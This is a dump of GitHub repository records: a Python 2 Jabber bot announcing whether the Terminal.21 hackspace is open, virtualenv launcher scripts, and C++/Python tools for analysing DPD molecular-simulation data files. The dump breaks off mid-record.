frlan/spacebot | https://github.com/frlan/spacebot | 37c95b0174fe0ef6d6313176a9b04951fd4b33e7 | 4a98e35a0dcee5a205c971b2b5940250f1454bac | 9fdad6b533ffca9f063243868fcef0a31960b4c8 | refs/heads/master | 2020-05-31T12:32:52.435911 | 2017-02-24T18:13:16 | 2017-02-24T18:13:16 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5939886569976807,
"alphanum_fraction": 0.6011332869529724,
"avg_line_length": 27.58450698852539,
"blob_id": "98e7e5797076a60ee0ce28ced7b11ce82fe51e5d",
"content_id": "b87ae0fda4f16d0f7853325f68e444601cdb3569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4059,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 142,
"path": "/src/spacebot.py",
"repo_name": "frlan/spacebot",
"src_encoding": "UTF-8",
"text": "import cgi\nfrom BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler\nimport os\nimport os.path\nfrom threading import Thread\nfrom ConfigParser import ConfigParser\nfrom jabberbot import JabberBot, botcmd\nfrom threading import Thread\nimport threading\nfrom Queue import Empty, Queue\nfrom exceptions import Exception\nimport logging\nimport time\n\ndef touch(fname):\n open(fname, 'a').close()\n os.utime(fname, None)\n\n\nclass SpaceApiHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n global spacebot\n print 'POST' \n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD':'POST',\n 'CONTENT_TYPE':self.headers['Content-Type'],\n })\n status = form.getvalue('status')\n spacebot.spacebotstatus.update(status) \n self.respond(\"\"\"asdf\"\"\")\n\n def do_GET(self):\n self.respond(\"\"\"geh weg\"\"\")\n\n def respond(self, response, status=200):\n self.send_response(status)\n self.send_header(\"Content-type\", \"text/html\")\n self.send_header(\"Content-length\", len(response))\n self.end_headers()\n self.wfile.write(response)\n\n\n\nclass SpaceBot(JabberBot):\n\n PING_FREQUENCY = 60 # XMPP Ping every X seconds\n PING_TIMEOUT = 2 # Ping timeout\n\n def __init__(self, chatroom, *args, **kargs):\n logging.debug('SpaceBot initialized')\n super(SpaceBot, self).__init__(*args, **kargs)\n self.spacebotstatus = SpaceBotStatus(self)\n self.chatroom = chatroom\n self.messages = Queue()\n\n def idle_proc(self):\n try:\n message = self.messages.get_nowait()\n except Empty:\n return super(SpaceBot, self).idle_proc()\n logging.info('send message {} to chatroom {}'.format(\n message, self.chatroom))\n #self.send(self.chatroom, message, message_type='groupchat')\n self.broadcast(message)\n\n def serve_forever(self):\n self.conn = None\n self._JabberBot__finished = False\n super(SpaceBot, self).serve_forever()\n\n def say(self, message):\n self.messages.put(message)\n\n @botcmd\n def status(self, mess, args):\n \"\"\"Status of the hackspace\"\"\"\n return \"Der Space ist im Moment {}\".format(\n \"offen\" if self.spacebotstatus.spaceopen else \"zu\")\n\n @botcmd\n def more(self, mess, args):\n \"\"\"More about Terminal.21\"\"\"\n return \"\"\"More infos @\n web:\\thttp://www.terminal21.de\n mail:\\[email protected]\n phone:\\t+49 345 23909940\n jabber muc:\\[email protected]\"\"\"\n\n\n\n\nclass SpaceBotStatus(object):\n current_status = 'closed'\n spaceopen = False\n\n def __init__(self, bot):\n self.listener = bot\n if os.path.isfile('spaceopen'):\n self.current_status = 'open'\n self.spaceopen = True\n\n def update(self, status):\n if status != self.current_status:\n if 'open' in status:\n self.spaceopen = True\n touch('spaceopen')\n else:\n self.spaceopen = False\n os.unlink('spaceopen')\n self.notify()\n self.current_status = status\n\n def notify(self):\n self.listener.say('Der Space ist jetzt {}'.format(\n 'offen' if self.spaceopen else 'zu'))\n\n\n\ndef run():\n global spacebot\n logformat = \"%(asctime)s %(levelname)s [%(name)s][%(threadName)s] %(message)s\"\n logging.basicConfig(format=logformat, level=logging.DEBUG)\n\n config = ConfigParser()\n config.read('etc/spacebot.ini')\n\n username = config.get('spacebot', 'username')\n password = config.get('spacebot', 'password')\n chatroom = config.get('spacebot', 'chatroom')\n\n spacebot = SpaceBot(chatroom, username, password)\n server = HTTPServer(('', 8889), SpaceApiHandler)\n thread = threading.Thread(target=server.serve_forever)\n thread.daemon = True\n thread.start()\n\n while True:\n 
spacebot.serve_forever()\n time.sleep(20)\n"
},
{
"alpha_fraction": 0.4444444477558136,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 8,
"blob_id": "f62726b1e3bd1769caaf03777ec31eb1b431704e",
"content_id": "b7dad2275a0b3492fbd0006d06db912405f600ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 18,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 2,
"path": "/README.md",
"repo_name": "frlan/spacebot",
"src_encoding": "UTF-8",
"text": "spacebot\n========\n"
}
] | 2 |
10000roots/ml-sample | https://github.com/10000roots/ml-sample | a0641c9ddfc40d7bce684b25b811874e9f959c55 | 3e49d67aa99e1738a60af19fc4080eed13a2f943 | 1351b1887ebbea2b11f58fff9cd67fa2f1582db9 | refs/heads/main | 2023-07-26T17:28:33.301242 | 2021-09-07T07:07:28 | 2021-09-07T07:07:28 | 403,876,932 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6379310488700867,
"alphanum_fraction": 0.6551724076271057,
"avg_line_length": 22.200000762939453,
"blob_id": "b2d3ba1c9127d698c375ffe1a45db9a6bf0e9c96",
"content_id": "f5e5689c65443dd47c7d042d93638c23abc29d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/env/bin/pydoc3.9",
"repo_name": "10000roots/ml-sample",
"src_encoding": "UTF-8",
"text": "#!/Users/mlee/development/sample_project/env/bin/python3.9\n\nimport pydoc\nif __name__ == '__main__':\n pydoc.cli()\n"
},
{
"alpha_fraction": 0.6641221642494202,
"alphanum_fraction": 0.6793892979621887,
"avg_line_length": 25.200000762939453,
"blob_id": "5ae54d69605a11ef01cde40b8cc944807d9ce845",
"content_id": "122f6815eb733f4929d50b2fb0f7cdd2e0a39985",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/env/bin/idle3.9",
"repo_name": "10000roots/ml-sample",
"src_encoding": "UTF-8",
"text": "#!/Users/mlee/development/sample_project/env/bin/python3.9\n\nfrom idlelib.pyshell import main\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7819548845291138,
"avg_line_length": 25.600000381469727,
"blob_id": "5bae6a9286724ef75ada64270f5f8842b6de9665",
"content_id": "bf9beb244a78d21f53e5a1367e0fed82333214e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/env/bin/2to3-3.9",
"repo_name": "10000roots/ml-sample",
"src_encoding": "UTF-8",
"text": "#!/Users/mlee/development/sample_project/env/bin/python3.9\nimport sys\nfrom lib2to3.main import main\n\nsys.exit(main(\"lib2to3.fixes\"))\n"
}
] | 3 |
ansko/cpp_dpd_analyzers | https://github.com/ansko/cpp_dpd_analyzers | c2c00dbacadb9cbf2eafbfe8c2e9c97a53621ab0 | 3b9f9e1c5c6cb7b5039a3c8ff540c471df6fb367 | 9552eee31183b68c32cf1a049140deb210a22303 | refs/heads/master | 2020-06-13T16:12:15.647925 | 2019-08-06T12:37:00 | 2019-08-06T12:37:00 | 194,706,111 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4277620315551758,
"alphanum_fraction": 0.6189801692962646,
"avg_line_length": 16.219512939453125,
"blob_id": "ccdd970a10bf127266990c349b5b0deab08389b6",
"content_id": "a9f865ea1074d6f73113ae0568c90df4f029ced1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 706,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 41,
"path": "/plot_two_rows.py",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport sys\n\n\n'''\n1 26.9815\n2 24.305\n3 28.0855\n4 15.9994\n5 15.9994\n6 15.9994\n7 15.9994\n8 1.00797\n9 14.0067\n10 12.0112\n11 12.0112\n12 1.00797\n13 1.00797\n14 12.0112\n15 15.9994\n16 14.0067\n17 14.0067\n'''\n\nif __name__ == '__main__':\n fname = sys.argv[1]\n\n xlabel = '1 from ' + fname\n ylabel = '2 from ' + fname\n out_fname = fname + '.pdf'\n\n lines = open(fname).readlines()\n xs = [float(line.split()[0]) for line in lines]\n ys = [float(line.split()[1]) for line in lines]\n plotted_lines = [plt.plot(xs, ys, 'k', linewidth=1)]\n\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n #plt.gca().set_xlim([0, 10])\n plt.savefig(out_fname)\n"
},
{
"alpha_fraction": 0.4695945978164673,
"alphanum_fraction": 0.5292792916297913,
"avg_line_length": 33.153846740722656,
"blob_id": "0eda28418de4d5b40d397fdcd30aacb567688530",
"content_id": "6af34db73762510c08333749f8b1a1cced767c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3552,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 104,
"path": "/src/get_fnames.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "// Should be removed (correct but deprecated)\n\n\n#ifndef GET_FNAMES_HPP\n#define GET_FNAMES_HPP\n\n\n#include <string>\n#include <vector>\n\n\nstd::vector<std::string> AVAILABLE_REGIMES = {\n \"article_params\",\n \"npt_attraction\",\n \"poly_mod_likeness\"\n};\n\n\nstd::vector<std::vector<std::string>> get_fnames(std::string regime)\n{\n std::string dpd_dir(\"/media/anton/Seagate Expansion Drive/dpd_calculations/\");\n std::vector<std::vector<std::string>> fnames;\n\n // Some a_ij are small.\n // Both modifier head and taill attract polymer.\n if (regime == \"poly_mod_likeness\")\n {\n std::string dir(\"NOT_SO_GOOD/0_poly_mod_likeness/\");\n std::vector<std::string> subdirs = {\n \"mmt_r10_n2_mod_n100_tail5_poly_p10_n50336/\",\n \"mmt_r10_n2_mod_n200_tail5_poly_p10_n50276/\",\n \"mmt_r10_n2_mod_n300_tail5_poly_p10_n50216/\",\n \"mmt_r10_n2_mod_n400_tail5_poly_p10_n50156/\"\n };\n\n for (size_t in_seria_idx = 0; in_seria_idx < 4; ++in_seria_idx)\n {\n fnames.push_back(std::vector<std::string>());\n for (size_t fname_idx = 0; fname_idx < 162; ++fname_idx)\n {\n std::string fname(dpd_dir + dir + subdirs[in_seria_idx]);\n fname += \"datafiles/dpd_d.\";\n fname += std::to_string(fname_idx * 1000);\n fname += \".data\";\n fnames[in_seria_idx].push_back(fname);\n }\n }\n }\n\n // Some a_ij are ok and taken in accordance with Trieste.\n else if (regime == \"article_params\")\n {\n std::string dir(\"SOME_OTHER_THINGS/ARTICLE_PARAMS/\");\n std::vector<std::string> subdirs = {\n \"13_mmt_r10_n2_mod_n100_tail5_poly_p10_n50336/\",\n \"14_mmt_r10_n2_mod_n200_tail5_poly_p10_n50276/\",\n \"15_mmt_r10_n2_mod_n300_tail5_poly_p10_n50216/\",\n \"16_mmt_r10_n2_mod_n400_tail5_poly_p10_n50156/\"\n };\n\n for (size_t in_seria_idx = 0; in_seria_idx < 4; ++in_seria_idx)\n {\n fnames.push_back(std::vector<std::string>());\n for (size_t fname_idx = 0; fname_idx < 82; ++fname_idx)\n {\n std::string fname(dpd_dir + dir + subdirs[in_seria_idx]);\n fname += \"datafiles/dpd_d.\";\n fname += std::to_string(fname_idx * 1000);\n fname += \".data\";\n fnames[in_seria_idx].push_back(fname);\n }\n }\n }\n\n // NPT + weak repulsion (==attraction) between polymer and modifier's tail\n else if (regime == \"npt_attraction\")\n {\n std::string dir(\"SOME_OTHER_THINGS/npt_attraction/\");\n std::vector<std::string> subdirs = {\n \"9_mmt_r10_n2_mod_n100_tail5_poly_p10_n50336/\",\n \"10_mmt_r10_n2_mod_n200_tail5_poly_p10_n50276/\",\n \"11_mmt_r10_n2_mod_n300_tail5_poly_p10_n50216/\",\n \"12_mmt_r10_n2_mod_n400_tail5_poly_p10_n50156/\"\n };\n\n for (size_t in_seria_idx = 0; in_seria_idx < 4; ++in_seria_idx)\n {\n fnames.push_back(std::vector<std::string>());\n for (size_t fname_idx = 0; fname_idx < 82; ++fname_idx)\n {\n std::string fname(dpd_dir + dir + subdirs[in_seria_idx]);\n fname += \"datafiles/dpd_d.\";\n fname += std::to_string(fname_idx * 1000);\n fname += \".data\";\n fnames[in_seria_idx].push_back(fname);\n }\n }\n }\n\n return fnames;\n}\n\n\n#endif // GET_FNAMES_HPP include guard\n"
},
{
"alpha_fraction": 0.5107182860374451,
"alphanum_fraction": 0.5182399153709412,
"avg_line_length": 26.132652282714844,
"blob_id": "e30c2cc35db88f7dd730260a9a31b99673b7a5ed",
"content_id": "74af82effa536df2bf63c844c64f48103fdf94db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2659,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 98,
"path": "/src/char_py_string.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef CHAR_PY_STRING_HPP\n#define CHAR_PY_STRING_HPP\n\n\n// For the better performance, CharPyString stores lines\n// as char[LINESIZE], i.e. LINESIZE is a maximal length of the line\n#define LINESIZE 250\n\n\n#include <cstring>\n\n\n// Container for the string, which also has\n// .startswith() and .endswith() from Python's str\n// and couple of another useful methods.\nclass CharPyString\n{\npublic:\n CharPyString(const char *cs)\n : _len(strlen(cs))\n {\n memcpy(this->_content, cs, strlen(cs) + 1);\n };\n\n const size_t len() const\n {\n return this->_len;\n }\n\n const bool startswith(const char *str) const\n {\n size_t len = strlen(str);\n if (len > this->_len)\n return false;\n for (size_t idx = 0; idx < len; idx++)\n if (str[idx] != this->_content[idx])\n return false;\n return true;\n }\n\n const bool endswith(const char *str) const\n {\n // When reading file in c-style in datafile_content.hpp,\n // this->_content[this->_len - 1] is a terminating character, so\n // this->_content[this->_len - 2] is a last valuable character.\n // When reading via std::getline(ifstream), -1 is correct.\n // delta should take care about this problem\n size_t delta = 1;\n if (this->_content[this->_len - 1] == '\\0')\n {\n delta +=1;\n } \n\n const size_t len = strlen(str);\n if (len > this->_len)\n return false;\n\n for (size_t idx = 0; idx < len; idx++)\n {\n if (str[len - 1 - idx] != this->_content[this->_len - 1 - idx])\n {\n return false;\n }\n }\n return true;\n }\n\n const float word_as_float(const size_t required_word_idx) const\n {\n char result[LINESIZE];\n size_t current_word_idx = 0;\n size_t letter_in_chosen_word_idx = 0;\n size_t chosen_word_length = 0;\n for (size_t letter_idx = 0; letter_idx < this->_len; ++letter_idx)\n {\n if (this->_content[letter_idx] == ' ')\n {\n current_word_idx++;\n continue;\n }\n if (current_word_idx == required_word_idx)\n {\n result[letter_in_chosen_word_idx] = this->_content[letter_idx];\n letter_in_chosen_word_idx++;\n chosen_word_length++;\n }\n }\n result[chosen_word_length] = '\\0';\n return strtod(result, nullptr);\n }\n\nprivate:\n size_t _len;\n char _content[LINESIZE];\n};\n\n\n#endif // CHAR_PY_STRING_HPP include guard\n"
},
{
"alpha_fraction": 0.5743175148963928,
"alphanum_fraction": 0.5824064612388611,
"avg_line_length": 21.477272033691406,
"blob_id": "4ca545ba0c5502ea2ac6eabdb385f50b306a5e36",
"content_id": "7a7f0c173086d5ba40606e7012e3355e578a700f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 989,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 44,
"path": "/main.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include <algorithm>\n#include <iostream>\n#include <string>\n#include <vector>\n\n#include \"src/char_py_string.hpp\"\n#include \"src/datafile_content.hpp\"\n#include \"src/get_fnames.hpp\"\n#include \"src/perform_seria.hpp\"\n#include \"src/platelets_distance.hpp\"\n\n\n#define MMT_ATOM_TYPE 1\n#define PLATELETS_COUNT 2\n\n\nextern std::vector<std::string> AVAILABLE_REGIMES;\n\n\nint main(int argc, char **argv)\n{\n if (argc < 2)\n {\n std::cout << \"Regime is not set in (empty argv[1])\\n\";\n return 0;\n }\n\n std::string regime(argv[1]);\n std::cout << \"---\" << regime << \"---\\n\";\n if (std::find(AVAILABLE_REGIMES.begin(), AVAILABLE_REGIMES.end(), regime)\n == AVAILABLE_REGIMES.end())\n {\n std::cout << \"Unknown regime: \" << regime << \"\\ntry one of:\\n\";\n for (auto &r : AVAILABLE_REGIMES)\n {\n std::cout << r << std::endl;\n }\n return 0;\n }\n\n perform_seria(regime, MMT_ATOM_TYPE, PLATELETS_COUNT);\n \n return 0;\n}\n"
},
{
"alpha_fraction": 0.6421282887458801,
"alphanum_fraction": 0.6421282887458801,
"avg_line_length": 30.66153907775879,
"blob_id": "9f514f851188487c02fcf1f4151d9671b9691c3f",
"content_id": "847d1aaa5493b44c4f34bd0ea34d2afc2f251d7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4116,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 130,
"path": "/src/structures.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef STRUCTURES_HPP\n#define STRUCTURES_HPP\n\n\n// Some immutable containers to store atomic structures data\n\n\nclass Atom\n{\npublic:\n Atom(unsigned int id, unsigned int molecule_tag, unsigned int type,\n float q, float x, float y, float z, int nx, int ny, int nz)\n : _id(id), _molecule_tag(molecule_tag), _type(type), _q(q),\n _x(x), _y(y), _z(z), _nx(nx), _ny(ny), _nz(nz)\n {};\n\n const unsigned int id() const { return this->_id; }\n const unsigned int molecule_tag() const { return this->_molecule_tag; }\n const unsigned int type() const { return this->_type; }\n const float q() const { return this->_q; }\n const float x() const { return this->_x; }\n const float y() const { return this->_y; }\n const float z() const { return this->_z; }\n const int nx() const { return this->_nx; }\n const int ny() const { return this->_ny; }\n const int nz() const { return this->_nz; }\n\nprivate:\n unsigned int _id;\n unsigned int _molecule_tag;\n unsigned int _type;\n float _q;\n float _x, _y, _z;\n int _nx, _ny, _nz;\n};\n\n\nclass Bond\n{\npublic:\n Bond(unsigned int id, unsigned int type, unsigned int atom_one_id,\n unsigned int atom_two_id)\n : _id(id), _type(type), _atom_one_id(atom_one_id), _atom_two_id(atom_two_id)\n {}\n\n const unsigned int id() const { return this->_id; }\n const unsigned int type() const { return this->_type; }\n const unsigned int atom_one_id() const { return this->_atom_one_id; }\n const unsigned int atom_two_id() const { return this->_atom_two_id; }\n\nprivate:\n unsigned int _id;\n unsigned int _type;\n unsigned int _atom_one_id, _atom_two_id;\n};\n\n\nclass Angle\n{\npublic:\n Angle(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id)\n : _id(id), _type(type), _atom_one_id(atom_one_id), _atom_two_id(atom_two_id),\n _atom_three_id(atom_three_id)\n {}\n\n const unsigned int id() const { return this->_id; }\n const unsigned int type() const { return this->_type; }\n const unsigned int atom_one_id() const { return this->_atom_one_id; }\n const unsigned int atom_two_id() const { return this->_atom_two_id; }\n const unsigned int atom_tree_id() const { return this->_atom_three_id; }\n\nprivate:\n unsigned int _id;\n unsigned int _type;\n unsigned int _atom_one_id, _atom_two_id, _atom_three_id;\n};\n\n\n// Since dihedrals and impropers are quite similar\nclass DihedralImproperBase\n{\npublic:\n const unsigned int id() const { return this->_id; }\n const unsigned int type() const { return this->_type; }\n const unsigned int atom_one_id() const { return this->_atom_one_id; }\n const unsigned int atom_two_id() const { return this->_atom_two_id; }\n const unsigned int atom_tree_id() const { return this->_atom_three_id; }\n const unsigned int atom_four_id() const { return this->_atom_three_id; }\n\nprotected:\n DihedralImproperBase(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id, unsigned int atom_four_id)\n : _id(id), _type(type), _atom_one_id(atom_one_id), _atom_two_id(atom_two_id),\n _atom_three_id(atom_three_id), _atom_four_id(atom_four_id)\n {}\n\n unsigned int _id;\n unsigned int _type;\n unsigned int _atom_one_id, _atom_two_id, _atom_three_id, _atom_four_id;\n};\n\n\nclass Dihedral : private DihedralImproperBase\n{\npublic:\n Dihedral(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id, unsigned int atom_four_id)\n : DihedralImproperBase(id, type, 
atom_one_id, atom_two_id, atom_three_id,\n atom_four_id)\n {};\n};\n\n\nclass Improper : private DihedralImproperBase\n{\npublic:\n Improper(unsigned int id, unsigned int type,\n unsigned int atom_one_id, unsigned int atom_two_id,\n unsigned int atom_three_id, unsigned int atom_four_id)\n : DihedralImproperBase(id, type, atom_one_id, atom_two_id, atom_three_id,\n atom_four_id)\n {};\n};\n\n\n#endif // STRUCTURES_HPP include guard\n"
},
{
"alpha_fraction": 0.752043604850769,
"alphanum_fraction": 0.752043604850769,
"avg_line_length": 18.3157901763916,
"blob_id": "783fd949b2412eefc823291a5d5550deb2dff78c",
"content_id": "89c2319f19f3e94aa4cc293b4b535e52bd05d7e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 367,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 19,
"path": "/src/platelets_distance.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#ifndef PLATELETS_DISTANCE_HPP\n#define PLATELETS_DISTANCE_HPP\n\n\n#include <cmath>\n#include <iostream>\n#include <map>\n#include <vector>\n\n#include \"datafile_content.hpp\"\n#include \"structures.hpp\"\n\n\nconst std::pair<float, float>\nplatelets_distance(DatafileContent &dfc, size_t mmt_atom_type,\n size_t platelets_count);\n\n\n#endif // PLATELETS_DISTANCE_HPP include guard\n"
},
{
"alpha_fraction": 0.5164158940315247,
"alphanum_fraction": 0.5184678435325623,
"avg_line_length": 28.239999771118164,
"blob_id": "abeeab5e01d28053fd6204422f4140f7fb61d986",
"content_id": "f4b548c2408c1ed7a253190348a93ce384d5927d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1462,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 50,
"path": "/src/perform_seria.hpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "// Should be removed (correct but deprecated)\n\n\n#ifndef PERFORM_SERIA_HPP\n#define PERFORM_SERIA_HPP\n\n\n#include <string>\n#include <vector>\n\n#include \"platelets_distance.hpp\"\n\n\n// Process folders for a seria of calculations\nvoid perform_seria(std::string regime, size_t mmt_atom_type, size_t platelets_count)\n{\n std::vector<std::vector<std::string>> fnames(get_fnames(regime));\n\n for (size_t in_seria_idx = 0; in_seria_idx < fnames.size(); ++in_seria_idx)\n {\n std::cout << \"~~~ \" << in_seria_idx << \" ~~~\\n\";\n if (fnames[in_seria_idx].size() == 0)\n {\n std::cout << \"Empty file list!\";\n return;\n }\n\n std::ofstream ofs(\"outs/\" + regime + \"_\" + std::to_string(in_seria_idx));\n for (size_t file_idx = 0; file_idx < fnames[in_seria_idx].size();\n ++file_idx)\n {\n FILE *fp = fopen(fnames[in_seria_idx][file_idx].c_str(), \"r\");\n if (fp == NULL)\n {\n continue;\n }\n DatafileContent dfc(fnames[in_seria_idx][file_idx]);\n auto &d = platelets_distance(dfc, mmt_atom_type, platelets_count);\n std::cout << in_seria_idx << \" \" << file_idx << \" \"\n << d.first << \" \" << d.second << std::endl;\n ofs << file_idx << \" \" << d.first << \" \" << d.second << std::endl;\n }\n ofs.close();\n }\n\n return;\n}\n\n\n#endif // PERFORM_SERIA_HPP include guard\n"
},
{
"alpha_fraction": 0.4857518672943115,
"alphanum_fraction": 0.5021920204162598,
"avg_line_length": 36.3934440612793,
"blob_id": "7871a0a0369a14ba41301582a2348ef5f521939c",
"content_id": "fe1a0af176cf1be14f053511718738168d358c26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4562,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 122,
"path": "/src/platelets_distance.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include \"platelets_distance.hpp\"\n\n\nconst std::pair<float,float>\nplatelets_distance(DatafileContent &dfc, size_t mmt_atom_type,\nsize_t platelets_count)\n{\n const Atom *all_atoms = dfc.atoms();\n\n // Extract only MMT atoms\n size_t mmt_atoms_count(0);\n // ids start from 1, so dfc.atoms()[0] is trash since it was set by key==id\n for (size_t idx = 1; idx < dfc.atoms_count(); idx++)\n {\n if (all_atoms[idx].type() == mmt_atom_type)\n {\n mmt_atoms_count++;\n }\n }\n Atom *mmt_atoms = (Atom *)malloc(sizeof(Atom) * (mmt_atoms_count + 1));\n size_t mmt_atoms_found = 0;\n // ids start from 1, so dfc.atoms()[0] is trash since it was set by key==id\n for (size_t idx = 1; idx < dfc.atoms_count(); idx++)\n {\n if (all_atoms[idx].type() == mmt_atom_type)\n {\n mmt_atoms[mmt_atoms_found + 1] = all_atoms[idx]; // trash in 0\n mmt_atoms_found++;\n }\n }\n\n // Map atoms onto platelets.\n if (mmt_atoms_found % platelets_count)\n {\n std::cerr << \"Error: MMT platelets are not identical!\\n\";\n return std::make_pair<float, float>(-1, -1);\n }\n std::map<unsigned int, std::vector<Atom> > atoms_onto_plats;\n const size_t in_plat = mmt_atoms_found / platelets_count;\n {\n for (size_t plat_idx = 0; plat_idx < platelets_count; ++plat_idx)\n {\n atoms_onto_plats[plat_idx] = std::vector<Atom>();\n }\n for (size_t idx = 1; idx < mmt_atoms_found + 1; ++idx) // trash in 0\n {\n size_t platelet_idx = (idx - 1) / in_plat;\n atoms_onto_plats[platelet_idx].push_back(all_atoms[idx]);\n }\n }\n\n // Get result\n float ave_closest_plat_plat(0);\n float ave_average_plat_plat(0);\n {\n // Global minimum between all distances between\n // atom of platelet i and atom of platelet j\n std::vector<std::vector<float> > closest_plat_plat(platelets_count,\n std::vector<float>(platelets_count,0));\n // Avearage of distances from atom of platelet i and \n // closest atom of platelet j\n std::vector<std::vector<float> > average_plat_plat(platelets_count,\n std::vector<float>(platelets_count,0));\n\n const float lx(dfc.xhi() - dfc.xlo());\n const float ly(dfc.yhi() - dfc.ylo());\n const float lz(dfc.zhi() - dfc.zlo());\n const float big_distance(std::max(std::max(lx, ly), lz));\n for(size_t idx1 = 0; idx1 < platelets_count; ++idx1)\n {\n const size_t n1(atoms_onto_plats[idx1].size());\n for(size_t idx2 = idx1 + 1; idx2 < platelets_count; ++idx2)\n {\n const size_t n2(atoms_onto_plats[idx2].size());\n\n float global_min(big_distance);\n float ave_local_min(0);\n\n for (auto &atom1 : atoms_onto_plats[idx1])\n {\n float local_min(big_distance);\n\n for (auto &atom2 : atoms_onto_plats[idx2])\n {\n float dx(fabs(atom1.x() - atom2.x()\n + (atom1.nx() - atom2.nx()) * lx));\n float dy(fabs(atom1.y() - atom2.y()\n + (atom1.ny() - atom2.ny()) * ly));\n float dz(fabs(atom1.z() - atom2.z()\n + (atom1.nz() - atom2.nz()) * lz));\n float dr(sqrt(dx*dx + dy*dy + dz*dz));\n\n global_min = std::min(global_min, dr);\n local_min = std::min(local_min, dr);\n }\n\n ave_local_min += local_min / n1;\n }\n closest_plat_plat[idx1][idx2] = global_min;\n closest_plat_plat[idx2][idx1] = global_min;\n average_plat_plat[idx1][idx2] = ave_local_min;\n average_plat_plat[idx2][idx1] = ave_local_min;\n }\n }\n for(size_t idx1 = 0; idx1 < platelets_count; ++idx1)\n {\n ave_closest_plat_plat += closest_plat_plat[idx1][0];\n }\n ave_closest_plat_plat /= platelets_count - 1;\n\n for(size_t idx1 = 0; idx1 < platelets_count; ++idx1)\n {\n ave_average_plat_plat += average_plat_plat[idx1][0];\n }\n ave_average_plat_plat /= platelets_count - 1;\n }\n\n 
free(mmt_atoms);\n\n return std::make_pair<float&, float&>(\n ave_average_plat_plat, ave_closest_plat_plat);\n}\n"
},
{
"alpha_fraction": 0.6090775728225708,
"alphanum_fraction": 0.6486091017723083,
"avg_line_length": 23.39285659790039,
"blob_id": "940a41246c6e6f916312ba73a3f0019f1a82d48c",
"content_id": "73b84cb76b34825df454483f798212fba9ad9ef1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 683,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 28,
"path": "/rdf.cpp",
"repo_name": "ansko/cpp_dpd_analyzers",
"src_encoding": "UTF-8",
"text": "#include <algorithm>\n#include <iostream>\n#include <map>\n#include <string>\n#include <vector>\n\n#include \"src/char_py_string.hpp\"\n#include \"src/datafile_content.hpp\"\n#include \"src/get_fnames.hpp\"\n#include \"src/perform_seria.hpp\"\n#include \"src/platelets_distance.hpp\"\n\n#include \"src/get_rdf.hpp\"\n\n\nint main(int argc, char **argv)\n{\n DatafileContent dfc(\"L_d.12500000.data\");\n //std::vector<unsigned int> atom_types({9, 10, 11, 12, 13, 14, 15, 16, 17});\n std::vector<unsigned int> atom_types({9});\n\n std::map<float, float> rdf_result = get_rdf(dfc, atom_types);\n\n for (auto &it : rdf_result)\n std::cout << it.first << \" \" << it.second << std::endl;\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6156299710273743,
